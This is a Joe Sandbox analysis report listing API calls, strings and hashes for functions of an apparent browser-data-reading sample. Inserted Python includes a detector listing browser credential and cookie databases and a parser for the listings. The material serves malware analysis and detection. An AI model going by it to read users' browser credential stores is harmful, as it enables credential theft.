• memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040AAB2
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memcpywcslen$_snwprintfmemset
• String ID: %s (%s)
• API String ID: 3979103747-1363028141
• Opcode ID: c6bf2ed547002a79412dcf0007d59944c4ad18f5877495ef8b57a3994eba2edc
• Instruction ID: b6d6d83be4212d1c483e19f60897e6584e32f0ecf7c368d7e799a2f76849004c
• Opcode Fuzzy Hash: c6bf2ed547002a79412dcf0007d59944c4ad18f5877495ef8b57a3994eba2edc
• Instruction Fuzzy Hash: 3C216FB2900218ABDF21EF55CD45D8AB7F8FF04358F058466E948AB102EB74EA18CFD5
APIs
• GetModuleHandleW.KERNEL32(00000000,?,004552B0,?,?,004116CB,?,General,?,00000000,00000001), ref: 00406FA9
• FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 00406FBA
• LoadResource.KERNEL32(00000000,00000000), ref: 00406FC8
• SizeofResource.KERNEL32(?,00000000), ref: 00406FD8
• LockResource.KERNEL32(00000000), ref: 00406FE1
• memcpy.MSVCRT(00000000,00000000,00000000), ref: 00407011
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
• String ID: BIN
• API String ID: 1668488027-1015027815
• Opcode ID: 0cc70d90eb5fe2022f84bb375c7f586452e31cf1ff3c5ba81afc9f946eb2bfa1
• Instruction ID: d4af116c543dc71c648d7e8b177643e8ae674b9e270c37636f22300aa75b878c
• Opcode Fuzzy Hash: 0cc70d90eb5fe2022f84bb375c7f586452e31cf1ff3c5ba81afc9f946eb2bfa1
• Instruction Fuzzy Hash: 5F11C635C00225EBC7116BE2DC49DAFBE78FF85765F020836F811B2291DB385D158AA9
APIs
• memset.MSVCRT ref: 0040DD6B
• GetDlgCtrlID.USER32(?), ref: 0040DD76
• GetWindowTextW.USER32(?,?,00001000), ref: 0040DD8D
• memset.MSVCRT ref: 0040DDB4
• GetClassNameW.USER32(?,?,000000FF), ref: 0040DDCB
• _wcsicmp.MSVCRT ref: 0040DDDD
  • Part of subcall function 0040DC1C: memset.MSVCRT ref: 0040DC2F
  • Part of subcall function 0040DC1C: _itow.MSVCRT ref: 0040DC3D
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
• String ID: sysdatetimepick32
• API String ID: 1028950076-4169760276
• Opcode ID: 8102298fea940e88dbedffba4a1eb78ca5cb1cc1c3ab67c0e4d17f8e38664f99
• Instruction ID: 9b29a85ed4be641e65b10d3861343448fbe1dffed752f9636a38eeae2f61c522
• Opcode Fuzzy Hash: 8102298fea940e88dbedffba4a1eb78ca5cb1cc1c3ab67c0e4d17f8e38664f99
• Instruction Fuzzy Hash: 5F11CA329002197BEB14FB91CC49AEF77BCEF05350F004076F908D2092E7344A85CB59
APIs
• memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,00420EBE,00000000,00000000), ref: 0041D868
• memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,00420EBE,00000000,00000000), ref: 0041D87A
• memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,00420EBE,00000000,00000000), ref: 0041D892
• memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,00420EBE,00000000,00000000), ref: 0041D8AF
• memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041D8C7
• memset.MSVCRT ref: 0041D994
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memcpy$memset
• String ID: -journal$-wal
• API String ID: 438689982-2894717839
• Opcode ID: d779981db6e39aa48904ea1662bdb9d3095299d2377483bbb01f90ee736efe62
• Instruction ID: de08a271c8033e28d41d160dfbeb7eb0a582d0ed0f381ff02535cf89bb22e03f
• Opcode Fuzzy Hash: d779981db6e39aa48904ea1662bdb9d3095299d2377483bbb01f90ee736efe62
• Instruction Fuzzy Hash: FFA1C1B1E04606AFDB14DF64C8417DEBBB0FF05314F14826EE46997382D738AA95CB98
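The -journal and -wal suffixes in the listing above are the names SQLite gives a database's rollback journal and write-ahead log; code that appends them to a path is handling a SQLite file together with its sidecar files, which is how browser credential and history stores are laid out on disk (Chromium's Login Data, History and Cookies, Firefox's places.sqlite and key4.db are all SQLite). A host-side way to catch that behaviour at runtime, as an added example that is not from the report or from the sample: a small Python detector over constructed file-access events that flags a non-browser process reading these stores and records which sidecars it touched. The event format, the process name stealer.exe, and the browser and file lists are my assumptions.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Dict, List, Tuple

# SQLite stores that hold browser credentials, history and cookies
# (Chromium and Firefox profile file names; the list is mine, not the report's).
BROWSER_DBS = {"login data", "web data", "history", "cookies",
               "places.sqlite", "cookies.sqlite", "key4.db"}
# Processes that legitimately open these files (assumed allow-list).
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe", "firefox.exe"}
# SQLite sidecars: rollback journal, write-ahead log and the WAL shared-memory index.
SIDECAR = re.compile(r"^(?P<base>.+?)(?P<suffix>-journal|-wal|-shm)?$", re.IGNORECASE)
# Constructed event format: one file operation per line.
EVENT = re.compile(r'^(?P<ts>\S+) pid=(?P<pid>\d+) image="(?P<image>[^"]+)" '
                   r'op=(?P<op>\w+) path="(?P<path>[^"]+)"$')


@dataclass(frozen=True)
class FileEvent:
    ts: str
    pid: int
    image: str
    op: str
    path: str


def parse_events(lines: str) -> List[FileEvent]:
    events = []
    for line in lines.splitlines():
        m = EVENT.match(line.strip())
        if m:
            events.append(FileEvent(m["ts"], int(m["pid"]), m["image"], m["op"], m["path"]))
    return events


def split_sidecar(path: str) -> Tuple[str, str]:
    """'...\\Default\\Login Data-journal' -> ('login data', '-journal')."""
    m = SIDECAR.match(PureWindowsPath(path).name)
    return m["base"].lower(), (m["suffix"] or "").lower()


def detect(events: List[FileEvent]) -> Dict[Tuple[int, str], Dict[str, set]]:
    """Non-browser processes that read browser SQLite stores, keyed by
    (pid, image), with the store names and the sidecar suffixes they touched.
    A reader that also pulls -journal/-wal wants the journal and WAL pages too,
    not just the main file, which is what a database-copying tool does."""
    findings: Dict[Tuple[int, str], Dict[str, set]] = {}
    for e in events:
        if e.op not in ("Open", "Read", "Copy"):
            continue
        base, suffix = split_sidecar(e.path)
        if base not in BROWSER_DBS:
            continue
        if PureWindowsPath(e.image).name.lower() in BROWSER_IMAGES:
            continue  # the browser reading its own profile is normal
        hit = findings.setdefault((e.pid, e.image), {"dbs": set(), "sidecars": set()})
        hit["dbs"].add(base)
        if suffix:
            hit["sidecars"].add(suffix)
    return findings


# Constructed sample (not from the report): Chrome touching its own store, then
# an unrelated process reading the login store with both sidecars and History.
SAMPLE_EVENTS = r"""
2025-01-08T10:15:01Z pid=3320 image="C:\Program Files\Google\Chrome\Application\chrome.exe" op=Read path="C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"
2025-01-08T10:15:02Z pid=5120 image="C:\Users\user\AppData\Local\Temp\stealer.exe" op=Open path="C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"
2025-01-08T10:15:02Z pid=5120 image="C:\Users\user\AppData\Local\Temp\stealer.exe" op=Read path="C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal"
2025-01-08T10:15:02Z pid=5120 image="C:\Users\user\AppData\Local\Temp\stealer.exe" op=Read path="C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-wal"
2025-01-08T10:15:03Z pid=5120 image="C:\Users\user\AppData\Local\Temp\stealer.exe" op=Read path="C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History"
2025-01-08T10:15:04Z pid=5120 image="C:\Users\user\AppData\Local\Temp\stealer.exe" op=Write path="C:\Users\user\AppData\Local\Temp\out.txt"
"""

if __name__ == "__main__":
    for (pid, image), hit in detect(parse_events(SAMPLE_EVENTS)).items():
        print(pid, image, sorted(hit["dbs"]), sorted(hit["sidecars"]))
```

The allow-list on image name is deliberately weak (a stealer can be named chrome.exe); in production key it on signer or on the browser's installation path, and treat a non-browser process that reads -journal or -wal for one of these stores as a stronger signal than a single read of the main file.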
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0040731C
• GetDlgItem.USER32(?,000003E9), ref: 0040732F
• GetDlgItem.USER32(?,000003E9), ref: 00407344
• GetDlgItem.USER32(?,000003E9), ref: 0040735C
• EndDialog.USER32(?,00000002), ref: 00407378
• EndDialog.USER32(?,00000001), ref: 0040738D
  • Part of subcall function 00407037: GetDlgItem.USER32(?,000003E9), ref: 00407044
  • Part of subcall function 00407037: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00407059
• SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 004073A5
• SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 004074B6
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: Item$Dialog$MessageSend
• String ID:
• API String ID: 3975816621-0
• Opcode ID: 1b8c1b744b44118a1d00fc74b7d8bfeaf52c27222ffa2e36781ac251d1cb99c8
• Instruction ID: 4d7fe854b84bffb36cdfb0f409f7702d3ffab78e9dfebf1b38e0a9661c8b6889
• Opcode Fuzzy Hash: 1b8c1b744b44118a1d00fc74b7d8bfeaf52c27222ffa2e36781ac251d1cb99c8
• Instruction Fuzzy Hash: 9261A330904B05ABEB31AF25C886A2BB7A5FF10314F00C63EFD01A66D1D778B955DB5A
APIs
• _wcsicmp.MSVCRT ref: 004461B4
• _wcsicmp.MSVCRT ref: 004461C9
• _wcsicmp.MSVCRT ref: 004461DE
  • Part of subcall function 00409DB6: wcslen.MSVCRT ref: 00409DC5
  • Part of subcall function 00409DB6: wcslen.MSVCRT ref: 00409DCF
  • Part of subcall function 00409DB6: _memicmp.MSVCRT ref: 00409DEA
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: _wcsicmp$wcslen$_memicmp
• String ID: .save$http://$https://$log profile$signIn
• API String ID: 1214746602-2708368587
• Opcode ID: c25681c330007c681027023b8fef3e46109c9436a99cce23058c3c7b6e338d58
• Instruction ID: 5e484990e1fe59e7fa87e07e780c8912ce5a7b58b3c72e29c52105d59935e75b
• Opcode Fuzzy Hash: c25681c330007c681027023b8fef3e46109c9436a99cce23058c3c7b6e338d58
• Instruction Fuzzy Hash: 824119711043019AF7306A65984136777D4DB47326F22896FFC6BE26C3EABCE885451F
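The function blocks above are raw output of the sandbox's IDA plugin: each function is summarised by its imported calls with the arguments the sandbox could recover, the strings it references, and a set of opcode and instruction hashes. Triaging hundreds of such blocks by eye does not scale, so the first step is to turn the "APIs" bullets into records and run rules over them. The Python below is an added example written for this page, not Joe Sandbox code and not part of the sample: it parses the bullet format shown (the two embedded listings are copied from the blocks above; the subcall line in the second is borrowed from another block to exercise that form), reads back which resource FindResourceW asks for (here lpName 0x32 = 50 of the custom type BIN, i.e. data stored in the image's own resource section after GetModuleHandleW(NULL)), and tags functions carrying the SQLite -journal/-wal suffixes or Win32 dialog calls. The tag names and the rule set are my own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# One "APIs" bullet of a Joe Sandbox function listing, for example
#   • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 00406FBA
#   • memset.MSVCRT ref: 0040DD6B
#   • Part of subcall function 0040DC1C: _itow.MSVCRT ref: 0040DC3D
API_LINE = re.compile(
    r"^\s*•?\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>\S+?)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?"
    r",? ref: (?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                          # call-site address from the "ref:" field
    subcall_of: Optional[str] = None  # set for "Part of subcall function" lines


def parse_api_lines(text: str) -> List[ApiCall]:
    """Extract the API bullets from a pasted function block; the other lines
    (Strings, Memory Dump Source, hashes, ...) do not match and are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        # The sandbox prints '?' for arguments it could not recover. Splitting on
        # ',' assumes one argument never contains a comma ("%s (%s)" is fine).
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def resource_ref(calls: List[ApiCall]) -> Optional[Tuple[int, str]]:
    """(lpName, lpType) of the first FindResourceA/W call, i.e. which embedded
    resource the function pulls out of the image. None if not recovered."""
    for c in calls:
        if c.api in ("FindResourceA", "FindResourceW") and len(c.args) >= 3:
            try:
                return int(c.args[1], 16), c.args[2]
            except ValueError:        # argument shown as '?' by the sandbox
                return None
    return None


def triage(calls: List[ApiCall]) -> Set[str]:
    """Rule set and tag names are my own; extend as needed."""
    apis = {c.api for c in calls}
    args = {a for c in calls for a in c.args}
    tags = set()
    if {"LoadResource", "LockResource"} <= apis and apis & {"FindResourceA", "FindResourceW"}:
        tags.add("embedded-resource-read")
        if "memcpy" in apis:
            tags.add("resource-copied")       # resource bytes copied out of the mapped image
    if {"-journal", "-wal"} <= args:
        tags.add("sqlite-sidecar-names")      # rollback journal / write-ahead log suffixes
    if apis & {"GetDlgItem", "EndDialog", "SendDlgItemMessageW", "GetDlgCtrlID"}:
        tags.add("dialog-ui")                 # Win32 dialog handling code
    return tags


# Listings copied from the report above (constructed as test input; the last
# line of the second listing is taken from a different block).
SAMPLE_RESOURCE_FUNC = """\
• GetModuleHandleW.KERNEL32(00000000,?,004552B0,?,?,004116CB,?,General,?,00000000,00000001), ref: 00406FA9
• FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 00406FBA
• LoadResource.KERNEL32(00000000,00000000), ref: 00406FC8
• SizeofResource.KERNEL32(?,00000000), ref: 00406FD8
• LockResource.KERNEL32(00000000), ref: 00406FE1
• memcpy.MSVCRT(00000000,00000000,00000000), ref: 00407011
Strings
Memory Dump Source
"""
SAMPLE_SQLITE_FUNC = """\
• memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,00420EBE,00000000,00000000), ref: 0041D892
• memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041D8C7
• memset.MSVCRT ref: 0041D994
  • Part of subcall function 0040DC1C: _itow.MSVCRT ref: 0040DC3D
"""

if __name__ == "__main__":
    for name, text in (("resource", SAMPLE_RESOURCE_FUNC), ("sqlite", SAMPLE_SQLITE_FUNC)):
        calls = parse_api_lines(text)
        print(name, len(calls), "calls", sorted(triage(calls)), resource_ref(calls))
```

Once the resource name and type are known, the embedded data can be carved from the sample statically with any PE resource viewer by looking for type BIN, entry 50, without running the file again.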
APIs
• ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 004074D6
• ??3@YAXPAX@Z.MSVCRT(00000000), ref: 004074F2
• ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00407518
• memset.MSVCRT ref: 00407528
• ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00407557
• InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 004075A4
• SetFocus.USER32(?,?,?,?), ref: 004075AD
• ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004075BD
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: ??2@$??3@$FocusInvalidateRectmemset
• String ID:
• API String ID: 2313361498-0
• Opcode ID: e675ad0a266bc96670d571add91fa9578aec271a38db8ff1ba01c2f3931e097b
• Instruction ID: aa93cf9892cb136432a885b6c040c00acd20fa1824247a7ddfcc4fe67478404c
• Opcode Fuzzy Hash: e675ad0a266bc96670d571add91fa9578aec271a38db8ff1ba01c2f3931e097b
• Instruction Fuzzy Hash: E031B0B1901201BFEB20AF29DD8591AB7A4FF04314B11853EF505E76A0D739EC80CBA5
APIs
• GetClientRect.USER32(?,?), ref: 0040779B
• GetWindow.USER32(?,00000005), ref: 004077B3
• GetWindow.USER32(00000000), ref: 004077B6
  • Part of subcall function 00401E4A: GetWindowRect.USER32(?,?), ref: 00401E59
• GetWindow.USER32(00000000,00000002), ref: 004077C2
• GetDlgItem.USER32(?,0000040C), ref: 004077D8
• SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00407817
• GetDlgItem.USER32(?,0000040E), ref: 00407821
• SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00407870
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: Window$ItemMessageRectSend$Client
• String ID:
• API String ID: 2047574939-0
• Opcode ID: fe54eeb19441843d95fdd849ea5d8071feeb7e1862c97c4ad6b95fcb8b242d9a
• Instruction ID: 2817ce33af67de4568897f7594256d54fbf45e6d9d619dfc684942712a2cffd5
• Opcode Fuzzy Hash: fe54eeb19441843d95fdd849ea5d8071feeb7e1862c97c4ad6b95fcb8b242d9a
• Instruction Fuzzy Hash: 11219576A4030877E6023B719C47FAF275CAB85718F11403AFE01771C2DABA6D1645AF
APIs
  • Part of subcall function 00449C90: memset.MSVCRT ref: 00449C9B
  • Part of subcall function 00449C90: memset.MSVCRT ref: 00449CAB
  • Part of subcall function 00449C90: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000020,?,00000000), ref: 00449D0D
  • Part of subcall function 00449C90: memcpy.MSVCRT(?,?,?,?,?,00000000,00000020,?,00000000), ref: 00449D5A
• memcpy.MSVCRT(?,?,00000040), ref: 00449E6F
• memcpy.MSVCRT(?,?,00000004,00000000), ref: 00449EBC
• memcpy.MSVCRT(?,?,00000040), ref: 00449F38
  • Part of subcall function 004499A0: memcpy.MSVCRT(?,00449AD2,00000040,?,?,?,00449AD2,?,?,?,?,00449EEF,?,?,?,00000000), ref: 004499D2
  • Part of subcall function 004499A0: memcpy.MSVCRT(?,00449AD2,00000008,?,?,?,00449AD2,?,?,?,?,00449EEF,?,?,?,00000000), ref: 00449A1E
• memcpy.MSVCRT(?,?,00000000), ref: 00449F88
• memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449FC9
• memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 00449FFA
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: memcpy$memset
• String ID: gj
• API String ID: 438689982-4203073231
• Opcode ID: a1826e050d6e3d68a1f2c5dfa01eae9680517dde8f20abcfd8e35bf37672f032
• Instruction ID: 3f3b464479e0d70e050848f60aaa72c5089d0acdf18e9fe99dc29a9aef4a41ed
• Opcode Fuzzy Hash: a1826e050d6e3d68a1f2c5dfa01eae9680517dde8f20abcfd8e35bf37672f032
• Instruction Fuzzy Hash: 6271B3B39083445BE310EF65D88099FB7E9ABD5348F050A2EF88997201E639DE09C797
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0040711A
• SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00407133
• SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00407140
• SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 0040714C
• memset.MSVCRT ref: 004071B0
• SendMessageW.USER32(?,0000105F,?,?), ref: 004071E5
• SetFocus.USER32(?), ref: 0040726B
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
• API String ID: 4281309102-0
• Opcode ID: 591c16118d863813ab471e160c4fd565b0629bf706d474ce27cebc159554fed7
• Instruction ID: e2e651f42ab0d4b7e7b6f1b53d2a0dc89a1afd109539422a1d010a9987f6e0ab
• Opcode Fuzzy Hash: 591c16118d863813ab471e160c4fd565b0629bf706d474ce27cebc159554fed7
• Instruction Fuzzy Hash: 8C415A74901219FBDB20DF95CC459AFBFB9FF04354F1040AAF508A6291D374AA80CBA5
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
Yara matches
Similarity
• API ID: _snwprintfwcscat
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
• API String ID: 384018552-4153097237
• Opcode ID: 4bae3b1c020fc46a540f34cadb4edddbf196e78b99bdfbdb6ab0bb772013daad
• Instruction ID: e0f29f3203d759466a2a243950708939727ff8ca945fdb9ba1a968257c2252f6
• Opcode Fuzzy Hash: 4bae3b1c020fc46a540f34cadb4edddbf196e78b99bdfbdb6ab0bb772013daad
• Instruction Fuzzy Hash: 8A31A031A00208EFCF10AF54CC85ADE7B75FF05324F11417AE805AB2A2D739AD55DB94
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                        • String ID: 0$6
                                                                                                                                                        • API String ID: 2029023288-3849865405
APIs
  • Part of subcall function 004053C0: GetLastError.KERNEL32(?,00000000,0040533E,?,?,?,00000000,00000000,?,00404787,?,?,00000060,00000000), ref: 004053D5
• memset.MSVCRT ref: 00405271
• memset.MSVCRT ref: 00405288
• memset.MSVCRT ref: 0040529F
• memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004052B4
